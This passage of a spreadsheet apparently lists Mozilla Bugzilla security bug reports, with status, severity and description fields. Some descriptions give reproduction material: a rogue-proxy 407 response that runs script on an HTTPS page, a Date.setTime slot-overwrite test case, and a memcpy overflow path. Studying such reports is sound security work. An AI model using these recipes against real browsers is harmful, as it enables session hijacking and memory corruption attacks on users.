        </is>
      </c>
      <c r="S4779" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T4779" t="n">
        <v>1</v>
      </c>
      <c r="U4779" t="n">
        <v>0</v>
      </c>
      <c r="V4779" t="n">
        <v>44</v>
      </c>
      <c r="W4779" t="inlineStr">
        <is>
          <t>There appears to be a relatively nasty bug in your handling of HTTPS. To reproduce, set up a TCP server on, say, localhost:1234, and have it read the HTTP request and respond with:
-- snip! --
HTTP/1.0 407 Burp
Proxy-Authenticate: basic
Connection: close
Content-Type: text/html
&lt;html&gt;
&lt;h1&gt;pwnd&lt;/h1&gt;
&lt;script&gt;alert(location.href)&lt;/script&gt;
[...some padding...]
-- snip! --
Then, configure localhost:1234 as a proxy for HTTP and HTTPS (on a rogue network, this could be done through auto-discovery).
Next, have the victim navigate to https://www.paypal.com/. A prompt will come up, but doing the most reasonable thing (dismissing it or hitting ESC) will display the HTML content returned by the proxy over plain text, executing it in the context of https://www.paypal.com/.</t>
        </is>
      </c>
      <c r="X4779" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4780">
      <c r="A4780" t="n">
        <v>950452</v>
      </c>
      <c r="B4780" t="inlineStr">
        <is>
          <t>2013-12-15 05:08:17 -0800</t>
        </is>
      </c>
      <c r="C4780" t="inlineStr">
        <is>
          <t>Assertion failure: MIR instruction returned value with unexpected type, at jit/IonMacroAssembler.cpp:1219</t>
        </is>
      </c>
      <c r="D4780" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:59 -0800</t>
        </is>
      </c>
      <c r="E4780" t="n">
        <v>1</v>
      </c>
      <c r="F4780" t="n">
        <v>1</v>
      </c>
      <c r="G4780" t="n">
        <v>3</v>
      </c>
      <c r="H4780" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4780" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4780" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4780" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4780" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4780" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4780" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4780" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4780" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main27+]</t>
        </is>
      </c>
      <c r="Q4780" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4780" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4780" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T4780" t="n">
        <v>1</v>
      </c>
      <c r="U4780" t="n">
        <v>0</v>
      </c>
      <c r="V4780" t="n">
        <v>24</v>
      </c>
      <c r="W4780" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision c049cb230d77 (run with --fuzzing-safe --ion-eager):
var ff = new f("foo")
function f(y) {
  y = +y;
};</t>
        </is>
      </c>
      <c r="X4780" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4781">
      <c r="A4781" t="n">
        <v>684938</v>
      </c>
      <c r="B4781" t="inlineStr">
        <is>
          <t>2011-09-06 11:38:50 -0700</t>
        </is>
      </c>
      <c r="C4781" t="inlineStr">
        <is>
          <t>Proxy nsXPCWrappedJS::Release to the main thread</t>
        </is>
      </c>
      <c r="D4781" t="inlineStr">
        <is>
          <t>2015-10-16 11:41:25 -0700</t>
        </is>
      </c>
      <c r="E4781" t="n">
        <v>1</v>
      </c>
      <c r="F4781" t="n">
        <v>1</v>
      </c>
      <c r="G4781" t="n">
        <v>3</v>
      </c>
      <c r="H4781" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4781" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4781" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4781" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4781" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4781" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4781" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4781" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4781" t="inlineStr">
        <is>
          <t>[sg:critical?][qa?]</t>
        </is>
      </c>
      <c r="Q4781" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4781" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4781" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T4781" t="n">
        <v>1</v>
      </c>
      <c r="U4781" t="n">
        <v>0</v>
      </c>
      <c r="V4781" t="n">
        <v>19</v>
      </c>
      <c r="W4781" t="inlineStr">
        <is>
          <t>Running the release on a thread other than the main thread can crash because we add nsXPCWrappedJS objects to the cycle collector, which assumes objects can't be refcounted while it runs. Both AddRef and Release are problematic, but Release will lead to crashes for sure whereas AddRef can lead to premature unlinking which shouldn't cause crashes, but might. I'll add a patch here to fix the crashes due to Release, bug 684711 will deal with the whole issue.</t>
        </is>
      </c>
      <c r="X4781" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4782">
      <c r="A4782" t="n">
        <v>524121</v>
      </c>
      <c r="B4782" t="inlineStr">
        <is>
          <t>2009-10-23 08:11:42 -0700</t>
        </is>
      </c>
      <c r="C4782" t="inlineStr">
        <is>
          <t>Date.setTime sets slots without checking for Date class</t>
        </is>
      </c>
      <c r="D4782" t="inlineStr">
        <is>
          <t>2010-01-25 00:07:21 -0800</t>
        </is>
      </c>
      <c r="E4782" t="n">
        <v>1</v>
      </c>
      <c r="F4782" t="n">
        <v>1</v>
      </c>
      <c r="G4782" t="n">
        <v>3</v>
      </c>
      <c r="H4782" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4782" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4782" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4782" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4782" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4782" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4782" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4782" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4782" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4782" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4782" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4782" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4782" t="n">
        <v>1</v>
      </c>
      <c r="U4782" t="n">
        <v>0</v>
      </c>
      <c r="V4782" t="n">
        <v>23</v>
      </c>
      <c r="W4782" t="inlineStr">
        <is>
          <t>My changes for bug 412296 removed the check for Date class in the implementation of Date.prototype.setTime method. This allows to overwrite slots with jsNaN value in arbitrary object. The following test case demonstrates the problem:
~/m/tm/js/src&gt; cat ~/s/x.js
var x = new Function('return 10');
Date.prototype.setTime.call(x);
print(x());
~/m/tm/js/src&gt; ~/build/js32.tm.dbg/js ~/s/x.js
Assertion failure: STOBJ_GET_CLASS(obj) == &amp;js_DateClass, at /home/igor/m/tm/js/src/jsdate.cpp:1227
Trace/breakpoint trap</t>
        </is>
      </c>
      <c r="X4782" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4783">
      <c r="A4783" t="n">
        <v>730425</v>
      </c>
      <c r="B4783" t="inlineStr">
        <is>
          <t>2012-02-24 13:25:01 -0800</t>
        </is>
      </c>
      <c r="C4783" t="inlineStr">
        <is>
          <t>Crash [@ nsMediaCacheStream::Read(char*, unsigned int, unsigned int*) ]</t>
        </is>
      </c>
      <c r="D4783" t="inlineStr">
        <is>
          <t>2012-04-10 21:33:44 -0700</t>
        </is>
      </c>
      <c r="E4783" t="n">
        <v>1</v>
      </c>
      <c r="F4783" t="n">
        <v>1</v>
      </c>
      <c r="G4783" t="n">
        <v>3</v>
      </c>
      <c r="H4783" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4783" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4783" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4783" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4783" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4783" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4783" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4783" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4783" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q4783" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4783" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4783" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T4783" t="n">
        <v>1</v>
      </c>
      <c r="U4783" t="n">
        <v>0</v>
      </c>
      <c r="V4783" t="n">
        <v>27</v>
      </c>
      <c r="W4783" t="inlineStr">
        <is>
          <t>1. http://www.youtube.com/watch?v=SmgT-rwn5W4&amp;feature=player_embedded#at=15
2. Crash Beta/11, Aurora/12, Nightly/13 Mac, Linux, Windows
After you crash once, it may be difficult to reproduce on the same system. Not sure why...
Ted's exploitable tool rates this as hightly exploitable.
I couldn't reproduce with a locally saved version.
bp-ec8057be-9224-4b25-85fa-8f9b02120224
bp-39b7c534-980f-4d60-bb49-e98a62120224</t>
        </is>
      </c>
      <c r="X4783" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4784">
      <c r="A4784" t="n">
        <v>1735856</v>
      </c>
      <c r="B4784" t="inlineStr">
        <is>
          <t>2021-10-14 10:53:12 -0700</t>
        </is>
      </c>
      <c r="C4784" t="inlineStr">
        <is>
          <t>Securitypolicyviolation leaks cross-origin information into parent for frame-ancestors violations</t>
        </is>
      </c>
      <c r="D4784" t="inlineStr">
        <is>
          <t>2022-08-26 23:29:21 -0700</t>
        </is>
      </c>
      <c r="E4784" t="n">
        <v>1</v>
      </c>
      <c r="F4784" t="n">
        <v>1</v>
      </c>
      <c r="G4784" t="n">
        <v>3</v>
      </c>
      <c r="H4784" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4784" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4784" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4784" t="inlineStr">
        <is>
          <t>Firefox 92</t>
        </is>
      </c>
      <c r="L4784" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4784" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4784" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4784" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4784" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main96+][adv-esr91.5+]</t>
        </is>
      </c>
      <c r="Q4784" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4784" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4784" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T4784" t="n">
        <v>1</v>
      </c>
      <c r="U4784" t="n">
        <v>0</v>
      </c>
      <c r="V4784" t="n">
        <v>22</v>
      </c>
      <c r="W4784" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Steps to reproduce:
Visit https://demo.websec.saarland/static/csp_frame.html
Define a securitypolicyviolation handler and frame an document that sets frame-ancestors that blocks the framing
Actual results:
A securitypolicyviolation event is thrown on the parent page
Expected results:
No securitypolicyviolation should be thrown as this leaks cross-origin information.
See https://bugs.chromium.org/p/chromium/issues/detail?id=1186611&amp;q=frame-ancestors&amp;can=1 for the discussion and fix in chromium.</t>
        </is>
      </c>
      <c r="X4784" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4785">
      <c r="A4785" t="n">
        <v>4836</v>
      </c>
      <c r="B4785" t="inlineStr">
        <is>
          <t>1999-04-08 20:12:02 -0700</t>
        </is>
      </c>
      <c r="C4785" t="inlineStr">
        <is>
          <t>UMR: nsBlockFrame::ComputeLineMaxElementSize()</t>
        </is>
      </c>
      <c r="D4785" t="inlineStr">
        <is>
          <t>2000-03-08 14:35:57 -0800</t>
        </is>
      </c>
      <c r="E4785" t="n">
        <v>1</v>
      </c>
      <c r="F4785" t="n">
        <v>1</v>
      </c>
      <c r="G4785" t="n">
        <v>3</v>
      </c>
      <c r="H4785" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4785" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4785" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4785" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4785" t="inlineStr">
        <is>
          <t>Sun</t>
        </is>
      </c>
      <c r="M4785" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N4785" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4785" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4785" t="inlineStr"/>
      <c r="Q4785" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4785" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4785" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4785" t="n">
        <v>1</v>
      </c>
      <c r="U4785" t="n">
        <v>0</v>
      </c>
      <c r="V4785" t="n">
        <v>2</v>
      </c>
      <c r="W4785" t="inlineStr">
        <is>
          <t>Pull/build from April 8, 1999. Solaris 2.6, gcc 2.7.2.3, Purify. Going to the
given URL will cause this to happen many many times.  Might be related to bug
#1431. cc'ing karnaze as he owns bug #1431.
****  Purify instrumented ./apprunner.pure (pid 10892)  ****
UMR: Uninitialized memory read (15 times):
  * This is occurring while in:
nsBlockFrame::ComputeLineMaxElementSize(nsBlockReflowState&amp;,nsLineBox*,nsSize*)
[nsBlockFrame.cpp:3290]
        nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;,nsLineBox*,int*)
[nsBlockFrame.cpp:2617]
        nsBlockFrame::ReflowLine(nsBlockReflowState&amp;,nsLineBox*,int*)
[nsBlockFrame.cpp:1961]
        nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;)
[nsBlockFrame.cpp:1769]
        nsBlockFrame::Reflow(nsIPresContext&amp;,nsHTMLReflowMetrics&amp;,const
nsHTMLReflowState&amp;,unsigned int&amp;) [nsBlockFrame.cpp:1206]
        nsBlockReflowContext::ReflowBlock(nsIFrame*,const
nsRect&amp;,int,int,int,nsMargin&amp;,unsigned int&amp;) [nsBlockReflowContext.cpp:225]
        nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;,nsLineBox*,int*)
[nsBlockFrame.cpp:2527]
        nsBlockFrame::ReflowLine(nsBlockReflowState&amp;,nsLineBox*,int*)
[nsBlockFrame.cpp:1961]
        nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;)
[nsBlockFrame.cpp:1769]
        nsBlockFrame::Reflow(nsIPresContext&amp;,nsHTMLReflowMetrics&amp;,const
nsHTMLReflowState&amp;,unsigned int&amp;) [nsBlockFrame.cpp:1206]
        nsBlockReflowContext::ReflowBlock(nsIFrame*,const
nsRect&amp;,int,int,int,nsMargin&amp;,unsigned int&amp;) [nsBlockReflowContext.cpp:225]
        nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;,nsLineBox*,int*)
[nsBlockFrame.cpp:2527]
        nsBlockFrame::ReflowLine(nsBlockReflowState&amp;,nsLineBox*,int*)
[nsBlockFrame.cpp:1961]
        nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;)
[nsBlockFrame.cpp:1769]
        nsBlockFrame::Reflow(nsIPresContext&amp;,nsHTMLReflowMetrics&amp;,const
nsHTMLReflowState&amp;,unsigned int&amp;) [nsBlockFrame.cpp:1206]
        nsAreaFrame::Reflow(nsIPresContext&amp;,nsHTMLReflowMetrics&amp;,const
nsHTMLReflowState&amp;,unsigned int&amp;) [nsAreaFrame.cpp:465]
nsContainerFrame::ReflowChild(nsIFrame*,nsIPresContext&amp;,nsHTMLReflowMetrics&amp;,con
st nsHTMLReflowState&amp;,unsigned int&amp;) [nsContainerFrame.cpp:388]
        RootFrame::Reflow(nsIPresContext&amp;,nsHTMLReflowMetrics&amp;,const
nsHTMLReflowState&amp;,unsigned int&amp;) [nsHTMLFrame.cpp:231]
nsContainerFrame::ReflowChild(nsIFrame*,nsIPresContext&amp;,nsHTMLReflowMetrics&amp;,con
st nsHTMLReflowState&amp;,unsigned int&amp;) [nsContainerFrame.cpp:388]
        ViewportFrame::Reflow(nsIPresContext&amp;,nsHTMLReflowMetrics&amp;,const
nsHTMLReflowState&amp;,unsigned int&amp;) [nsViewportFrame.cpp:432]
        nsHTMLReflowCommand::Dispatch(nsIPresContext&amp;,nsHTMLReflowMetrics&amp;,const
nsSize&amp;,nsIRenderingContext&amp;) [nsHTMLReflowCommand.cpp:165]
        PresShell::ProcessReflowCommands() [nsPresShell.cpp:1242]
        PresShell::ExitReflowLock() [nsPresShell.cpp:668]
        PresShell::ContentAppended(nsIDocument*,nsIContent*,int)
[nsPresShell.cpp:1748]
        nsDocument::ContentAppended(nsIContent*,int) [nsDocument.cpp:1456]
        nsHTMLDocument::ContentAppended(nsIContent*,int)
[nsHTMLDocument.cpp:631]
        HTMLContentSink::DidBuildModel(int) [nsHTMLContentSink.cpp:1536]
        CNavDTD::DidBuildModel(unsigned int,int,nsIParser*,nsIContentSink*)
[CNavDTD.cpp:577]
        nsParser::DidBuildModel(unsigned int) [nsParser.cpp:447]
        nsParser::ResumeParse(nsIDTD*) [nsParser.cpp:803]
  * Reading 4 bytes from 0xefff6850 on the stack.
  * Address 0xefff6850 is 240 bytes below frame pointer in function
nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;,nsLineBox*,int*).
This happens because nsBlockFrame::ReflowBlockFrame() is passing it
&amp;maxElementSize, which is calculates from the
nsBlockReflowContext.GetMaxElementSize().  the 'mMaxElementSize' value on
nsBlockReflowContext is never initialized at all that I can see.</t>
        </is>
      </c>
      <c r="X4785" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4786">
      <c r="A4786" t="n">
        <v>871368</v>
      </c>
      <c r="B4786" t="inlineStr">
        <is>
          <t>2013-05-12 19:52:44 -0700</t>
        </is>
      </c>
      <c r="C4786" t="inlineStr">
        <is>
          <t>Arbitrary code execution using crypto.generateCRMFRequest</t>
        </is>
      </c>
      <c r="D4786" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:11 -0800</t>
        </is>
      </c>
      <c r="E4786" t="n">
        <v>1</v>
      </c>
      <c r="F4786" t="n">
        <v>1</v>
      </c>
      <c r="G4786" t="n">
        <v>3</v>
      </c>
      <c r="H4786" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4786" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4786" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4786" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4786" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4786" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4786" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4786" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4786" t="inlineStr">
        <is>
          <t>[adv-main23+][adv-esr1708+][fixed by bug 871301, but keep the dep private]</t>
        </is>
      </c>
      <c r="Q4786" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4786" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4786" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T4786" t="n">
        <v>1</v>
      </c>
      <c r="U4786" t="n">
        <v>0</v>
      </c>
      <c r="V4786" t="n">
        <v>40</v>
      </c>
      <c r="W4786" t="inlineStr">
        <is>
          <t>nsCrypto::GenerateCRMFRequest uses JS_GetGlobalObject, so a callback script can be executed with a global object that is unrelated to the caller.  This allows for a XSS attack or arbitrary code execution.
Bug 871301 seems to fix this.</t>
        </is>
      </c>
      <c r="X4786" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4787">
      <c r="A4787" t="n">
        <v>387333</v>
      </c>
      <c r="B4787" t="inlineStr">
        <is>
          <t>2007-07-08 14:31:52 -0700</t>
        </is>
      </c>
      <c r="C4787" t="inlineStr">
        <is>
          <t>[FIX]unauthorized access to wyciwyg:// documents possible</t>
        </is>
      </c>
      <c r="D4787" t="inlineStr">
        <is>
          <t>2010-10-27 02:23:11 -0700</t>
        </is>
      </c>
      <c r="E4787" t="n">
        <v>1</v>
      </c>
      <c r="F4787" t="n">
        <v>1</v>
      </c>
      <c r="G4787" t="n">
        <v>3</v>
      </c>
      <c r="H4787" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4787" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4787" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4787" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L4787" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4787" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4787" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4787" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4787" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q4787" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4787" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4787" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4787" t="n">
        <v>1</v>
      </c>
      <c r="U4787" t="n">
        <v>1</v>
      </c>
      <c r="V4787" t="n">
        <v>14</v>
      </c>
      <c r="W4787" t="inlineStr">
        <is>
          <t>It is possible to access wyciwyg:// documents without proper same domain policy checks through the use of HTTP 302 redirects, as demonstrated here:
http://lcamtuf.coredump.cx/ffcache/
This enables the attacker to: steal sensitive data displayed on dynamically generated pages; perform cache poisoning; and execute own code or display own content with URL bar and SSL certificate data of the attacked page (URL spoofing++).
PS. It is also possible to access wyciwyg:// through XMLHttpRequest and IFRAMEd view-source:. Although proper access control seems to be more or less exercised, this seems to be not the intended effect, judging from comments in existing code; and the mechanism can be used by rogue sites to conveniently tag visitors regardless of cookie restrictions (write a unique ID  to a wyciwyg:// file with document.write(), then do XMLHttpRequest on returning visitors), so you might want to tighten it.</t>
        </is>
      </c>
      <c r="X4787" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4788">
      <c r="A4788" t="n">
        <v>615657</v>
      </c>
      <c r="B4788" t="inlineStr">
        <is>
          <t>2010-11-30 12:21:22 -0800</t>
        </is>
      </c>
      <c r="C4788" t="inlineStr">
        <is>
          <t>Buffer overflow/Memory corruption: cg-&gt;upvarList.count &lt;= cg-&gt;upvarMap.length</t>
        </is>
      </c>
      <c r="D4788" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:51 -0700</t>
        </is>
      </c>
      <c r="E4788" t="n">
        <v>1</v>
      </c>
      <c r="F4788" t="n">
        <v>1</v>
      </c>
      <c r="G4788" t="n">
        <v>3</v>
      </c>
      <c r="H4788" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4788" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4788" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4788" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4788" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4788" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4788" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4788" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4788" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4788" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4788" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4788" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4788" t="n">
        <v>1</v>
      </c>
      <c r="U4788" t="n">
        <v>0</v>
      </c>
      <c r="V4788" t="n">
        <v>20</v>
      </c>
      <c r="W4788" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
Build Identifier: 
The following problem affects all Spidermonkey versions I tested (1.9.2 and 2.0) and hence Firefox 3.5.x and Firefox 4. Under test were mozilla-2.0-297086a0fb61 and mozilla-1-9-2-053f07027a38:
There is a serious problem with the code that copies upvarMap.vector in jsscript.cpp. Using a combination of inner/outer functions with eval, we were able to trigger the following assertion (mozilla-2.0-297086a0fb61):
Assertion failure: cg-&gt;upvarList.count &lt;= cg-&gt;upvarMap.length, at jsscript.cpp:1224
The respective code looks as follows:
if (cg-&gt;upvarList.count != 0) {
    JS_ASSERT(cg-&gt;upvarList.count &lt;= cg-&gt;upvarMap.length);
    memcpy(script-&gt;upvars()-&gt;vector, cg-&gt;upvarMap.vector,
           cg-&gt;upvarList.count * sizeof(uint32));
    cg-&gt;upvarList.clear();
    cx-&gt;free(cg-&gt;upvarMap.vector);
    cg-&gt;upvarMap.vector = NULL;
}
In an optimized non-debug build, the memcpy simply either overruns the available space in script-&gt;upvars()-&gt;vector, or reads beyond cg-&gt;upvarMap.vector or both.
The attacker can control cg-&gt;upvarList.count arbitrarily here. We suspect the issue to be exploitable although it shouldn't be too easy (the attacker can hardly control what is actually written, only the amount).
I'll attach test.js to reproduce the problem and some valgrind logs showing different behavior depending on how large the upvar list gets. Using 24 additional upvars in the script triggers the assertion, using 32 crashes straight away without even asserting (I suspect two different problems here).
Reproducible: Always
Steps to Reproduce:
1. Run test.js
2. Observe crash/assertion
Actual Results:  
Crash/Assertion
Expected Results:  
Normal run.</t>
        </is>
      </c>
      <c r="X4788" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4789">
      <c r="A4789" t="n">
        <v>1490585</v>
      </c>
      <c r="B4789" t="inlineStr">
        <is>
          <t>2018-09-11 23:36:08 -0700</t>
        </is>
      </c>
      <c r="C4789" t="inlineStr">
        <is>
          <t>Startup crash in nsSSLStatus::~nsSSLStatus after downgrading profile</t>
        </is>
      </c>
      <c r="D4789" t="inlineStr">
        <is>
          <t>2020-02-16 17:40:20 -0800</t>
        </is>
      </c>
      <c r="E4789" t="n">
        <v>1</v>
      </c>
      <c r="F4789" t="n">
        <v>1</v>
      </c>
      <c r="G4789" t="n">
        <v>3</v>
      </c>
      <c r="H4789" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4789" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4789" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K4789" t="inlineStr">
        <is>
          <t>62 Branch</t>
        </is>
      </c>
      <c r="L4789" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4789" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N4789" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4789" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4789" t="inlineStr">
        <is>
          <t>[psm-assigned][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4789" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4789" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4789" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T4789" t="n">
        <v>1</v>
